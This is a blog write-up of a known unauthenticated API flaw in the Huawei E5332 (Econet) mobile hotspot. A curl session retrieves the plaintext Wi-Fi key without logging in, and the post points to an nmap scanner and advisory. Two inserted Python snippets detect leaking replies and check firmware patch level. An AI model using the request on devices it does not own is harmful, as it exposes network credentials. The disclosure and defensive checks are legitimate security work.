Hacking Econet 3G MIFI for fun and mostly more fun. Huawei E5332

Hacking Econet Huawei E5332 Modems.


Image: TechZim

So I got one of these babies last year from a friend. I've been using it for a few months now, and I decided to try to break into one. To be fair, calling them Econet modems is a bit of an oversell, as they are simply rebranded Huawei modems.


This blog post describes how to hack the Huawei E5332 modem to obtain the Wi-Fi password, change the DMZ settings, PIN access code and SIM card lock, and force the device to reboot by sending a specially crafted HTTP request.


I should point out that this vulnerability has been in the wild for a few years now, and a quick search for "Huawei E5332 CVE" will return a few results. I decided to try out several of these vulnerabilities on my own modem and also wrote an nmap script to identify mobile routers that are vulnerable and obtain device information.

Proof of Concept Video



About Device

Huawei E5332 Mobile WiFi is a high-speed packet access mobile hotspot. It is a multi-mode wireless terminal for SOHO and business professionals.

You can connect to the E5332 through the USB interface of a computer or over Wi-Fi. In the service area of an HSPA+/HSPA/UMTS/EDGE/GPRS/GSM network, you can surf the Internet and send/receive messages/emails cordlessly. The E5332 router is fast, reliable, and easy to operate. Thus, mobile users can experience many new features and services with the unlocked E5332.
 

Huawei E5332 Mobile WiFi Features:

* HSPA+ (DL) data service of up to 21.6 Mbit/s
* HSPA+ (UL) data service of up to 5.76 Mbit/s
* HSDPA (DL) data service of up to 14.4 Mbit/s
* HSUPA (UL) data service of up to 5.76 Mbit/s
* UMTS data service of up to 384 kbit/s
* EDGE data service of up to 236.8 kbit/s
* GPRS data service of up to 85.6 kbit/s
* PS domain data service based on UMTS and GSM
* SMS based on CS/PS domain of GSM and UMTS
* Wi-Fi
* Built-in DHCP Server, DNS RELAY and NAT
* Plug and Play (PnP)
* Standard Micro USB interface
* LED indicators
* Built-in UMTS and WLAN high gain antenna
* External antenna interface, better signal
* Dimension: 92.8*60*13.8mm
* Weight: 91g
* Windows XP, Windows Vista, Windows 7, MAC OS X 10.5, 10.6 and 10.7


Usage

When you connect to the MiFi you can access the device control panel by navigating to http://mobilewifi.home/ in your browser. You can log in using the default credentials:
Username: admin
Password: admin


Once you've logged in you can read SMS messages, run USSD commands and access device settings.

Inspecting the network traffic, you notice the site makes extensive use of AJAX calls that return XML data, which is then parsed to update the graphical user interface.

Some of the captured API calls include:
  • http://192.168.1.1/api/monitoring/status
  • http://192.168.1.1/api/monitoring/traffic-statistics
  • http://192.168.1.1/api/wlan/basic-settings
  • http://192.168.1.1/api/wlan/host-list
  • http://192.168.1.1/api/monitoring/check-notifications
There are several other API calls; they are covered in detail in the source code.

Each user is authenticated and tracked using cookies. The user is logged out after an extended period of inactivity.

Vulnerability

Replaying the network traffic even after the session has expired exposes several vulnerabilities in authentication. Any client connected to the device can query the API without being authenticated. This compromises the security of the entire network, as Wi-Fi passwords and other settings can be accessed by anyone connected to the device.

This vulnerability was first discovered on 2013-12-06 and made public on 2014-03-07. The initial vulnerability disclosure on ExploitDB by SEC Consult Vulnerability Lab includes a detailed explanation of the multiple vulnerabilities they discovered.



Accessing WIFI Passwords

Probably the most interesting of all the vulnerabilities is the ability to access Wi-Fi passwords in plaintext without any proper authentication. This takes the phrase "be careful who you trust on your network" to a whole new level. This information can be used to pivot onto other networks. Basically, once you are connected to the mobile hotspot you can request the settings through a simple HTTP API call to the endpoint http://192.168.1.1/api/wlan/security-settings:


trevor@base2theory:~$ curl http://192.168.1.1/api/wlan/security-settings -v | more
* Hostname was NOT found in DNS cache
*   Trying 192.168.1.1...
* Connected to 192.168.1.1 (192.168.1.1) port 80 (#0)
> GET /api/wlan/security-settings HTTP/1.1
> User-Agent: curl/7.38.0
> Host: 192.168.1.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sat, 03 Jan 1970 22:44:39 GMT
< Cache-Control: no-cache
< Pragma: no-cache
< Expires: -1
* Server IPWEBS/1.4.0 is not blacklisted
< Server: IPWEBS/1.4.0
< Cache-Control: no-cache
< Content-Length: 517
< Content-Type: text/html

* Connection #0 to host 192.168.1.1 left intact
<?xml version="1.0" encoding="UTF-8"?>
<response>
<WifiAuthmode>WPA/WPA2-PSK</WifiAuthmode>
<WifiBasicencryptionmodes>WEP</WifiBasicencryptionmodes>
<WifiWpaencryptionmodes>MIX</WifiWpaencryptionmodes>
<WifiWepKey1>12345</WifiWepKey1>
<WifiWepKey2>12345</WifiWepKey2>
<WifiWepKey3>12345</WifiWepKey3>
<WifiWepKey4>12345</WifiWepKey4>
<WifiWepKeyIndex>1</WifiWepKeyIndex>
<WifiWpapsk>10518994</WifiWpapsk>
<WifiWpsenbl>0</WifiWpsenbl>
<WifiWpscfg>1</WifiWpscfg>
<WifiRestart>1</WifiRestart>
</response>
 


The request returns a treasure trove. No authentication required: just send an HTTP request and it coughs up the plaintext password.
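Here is an added example (my own, not code from this post or from the GitHub projects it links) of how a network owner or scanner author can parse that XML reply and decide whether a device is handing its Wi-Fi key to an unauthenticated client, without writing the secret into a report. It assumes the body has exactly the shape shown in the curl session above; the "denied" reply used as the non-leaking case is a constructed sample with an assumed shape, not a response observed from a patched device.

```python
"""Parse the E5332's /api/wlan/security-settings reply and decide whether a
device is leaking its Wi-Fi key to an unauthenticated client.

Added example; it assumes the body has the shape shown in the curl session in
this post. Both sample inputs below are constructed."""
import xml.etree.ElementTree as ET

# Constructed sample: the body captured in the post (same fields, same values).
LEAKING_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<response>
<WifiAuthmode>WPA/WPA2-PSK</WifiAuthmode>
<WifiBasicencryptionmodes>WEP</WifiBasicencryptionmodes>
<WifiWpaencryptionmodes>MIX</WifiWpaencryptionmodes>
<WifiWepKey1>12345</WifiWepKey1>
<WifiWepKey2>12345</WifiWepKey2>
<WifiWepKey3>12345</WifiWepKey3>
<WifiWepKey4>12345</WifiWepKey4>
<WifiWepKeyIndex>1</WifiWepKeyIndex>
<WifiWpapsk>10518994</WifiWpapsk>
<WifiWpsenbl>0</WifiWpsenbl>
<WifiWpscfg>1</WifiWpscfg>
<WifiRestart>1</WifiRestart>
</response>"""

# Constructed sample of what a device that enforces authentication might send
# instead (assumed shape: an <error> root carrying no settings; not observed).
DENIED_RESPONSE = """<?xml version="1.0" encoding="UTF-8"?>
<error>
<code>PLACEHOLDER_NOT_LOGGED_IN</code>
<message></message>
</error>"""

SECRET_FIELDS = ("WifiWpapsk", "WifiWepKey1", "WifiWepKey2",
                 "WifiWepKey3", "WifiWepKey4")


def parse_security_settings(body: str) -> dict:
    """Return the children of <response> as a {tag: text} dict.

    Returns {} if the body is not well-formed XML or its root is not <response>
    (e.g. an error reply), so "no settings" is treated as "not leaking".
    The device labels the body text/html; Content-Type is ignored on purpose."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return {}
    if root.tag != "response":
        return {}
    return {child.tag: (child.text or "").strip() for child in root}


def leaks_credentials(body: str) -> bool:
    """True if the reply carries any non-empty Wi-Fi key, meaning an
    unauthenticated client has just received the network password."""
    settings = parse_security_settings(body)
    return any(settings.get(field) for field in SECRET_FIELDS)


def redacted_summary(body: str) -> dict:
    """Settings with secrets masked, safe for a scan report or log line.
    Only the length of each secret is kept, enough to flag short keys."""
    settings = parse_security_settings(body)
    summary = {}
    for tag, value in settings.items():
        if tag in SECRET_FIELDS:
            summary[tag] = "<redacted, %d chars>" % len(value) if value else ""
        else:
            summary[tag] = value
    return summary


if __name__ == "__main__":
    for name, body in (("leaking", LEAKING_RESPONSE), ("denied", DENIED_RESPONSE)):
        print(name, "leaks credentials:", leaks_credentials(body))
        print("  ", redacted_summary(body))
```

The classification hinges on the presence of a non-empty key in the reply rather than on the HTTP status, because the capture above shows the device answering 200 OK with the secrets in the body; a check that only looked at the status line would miss the whole problem.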

Exploiting

This is a very old vulnerability and there aren't that many of these devices out there (*hopefully*), and it's not exactly a high-risk vulnerability considering the attacker first needs access to the network. So it's not one of those vulnerabilities you will find very often, but I thought I'd just write an nmap script for it. Automate everything ;)


Automate everything

You can find the nmap script to scan for vulnerable Huawei E5332 modems on GitHub -> Huawei E5332 MIFI NSE


If you want to see all the actions you can perform without authentication, I recommend you check out https://github.com/trevorsibanda/Huawei-Router_Python


Solution and Mitigation

 

UPDATE YOUR DEVICE!!! According to the security advisory released by Huawei, this and other vulnerabilities were fixed in firmware version 21.344.27.00.1080.

Updating the device is the best option. If that's not an option, you should be wary of who you admit onto your network if you use one of these outdated babies.
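As an added example (mine, not from this post or from Huawei), here is a small firmware-version check a device owner can use to decide whether a modem is at or above the fixed version the advisory names, comparing the dotted components numerically instead of as strings. The `<SoftwareVersion>` element it reads is an assumption about the device's information reply, not something shown in this post, and the sample reply is constructed.

```python
"""Decide whether an E5332's firmware is at or above the version that Huawei's
advisory names as fixed (21.344.27.00.1080, as quoted in this post).

Added example; the <SoftwareVersion> element is an assumed field name and the
sample reply is constructed."""
import xml.etree.ElementTree as ET

FIXED_VERSION = "21.344.27.00.1080"  # from the Huawei advisory, via this post

# Constructed sample of a device-information reply (assumed field name).
SAMPLE_DEVICE_INFO = """<?xml version="1.0" encoding="UTF-8"?>
<response>
<DeviceName>E5332</DeviceName>
<SoftwareVersion>21.344.20.00.1080</SoftwareVersion>
</response>"""


def parse_version(version: str) -> tuple:
    """'21.344.27.00.1080' -> (21, 344, 27, 0, 1080).

    Raises ValueError on anything non-numeric so an unparseable version is
    never silently treated as patched."""
    parts = version.strip().split(".")
    if not all(part.isdigit() for part in parts):
        raise ValueError("unrecognised firmware version: %r" % version)
    return tuple(int(part) for part in parts)


def is_patched(version: str, fixed: str = FIXED_VERSION) -> bool:
    """True if `version` >= `fixed`, compared component by component as
    integers (so 21.344.9.x sorts below 21.344.27.x, unlike a string compare).
    A shorter version is padded with zeros before comparing."""
    have, need = parse_version(version), parse_version(fixed)
    width = max(len(have), len(need))
    have += (0,) * (width - len(have))
    need += (0,) * (width - len(need))
    return have >= need


def firmware_from_device_info(body: str):
    """Pull the firmware string out of a device-information reply.
    Returns None if the body is not XML or the field is absent."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    node = root.find("SoftwareVersion")  # assumed element name
    return node.text.strip() if node is not None and node.text else None


def needs_update(body: str):
    """True when the firmware predates the fix, False when it is at or above
    it, None when the version cannot be read (treat None as "go and check")."""
    version = firmware_from_device_info(body)
    if version is None:
        return None
    try:
        return not is_patched(version)
    except ValueError:
        return None


if __name__ == "__main__":
    print("sample device needs update:", needs_update(SAMPLE_DEVICE_INFO))
```

`needs_update` deliberately returns `None` rather than `False` when the version is missing or malformed, so a fleet report never marks a device as safe just because it failed to answer properly.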



 

References & Sources


Huawei Security Advisory - http://www.huawei.com/en/psirt/security-advisories/hw-373056
ExploitDb Disclosure     - https://www.exploit-db.com/exploits/32161/
Background reading       - http://blog.philippklaus.de/2015/04/huawei-e5332-portable-umts-wifi-router-with-battery/

Comments

  1. cool article bro also as an aside using MAC address filtering can also buy one some time if you don't wanna upgrade.

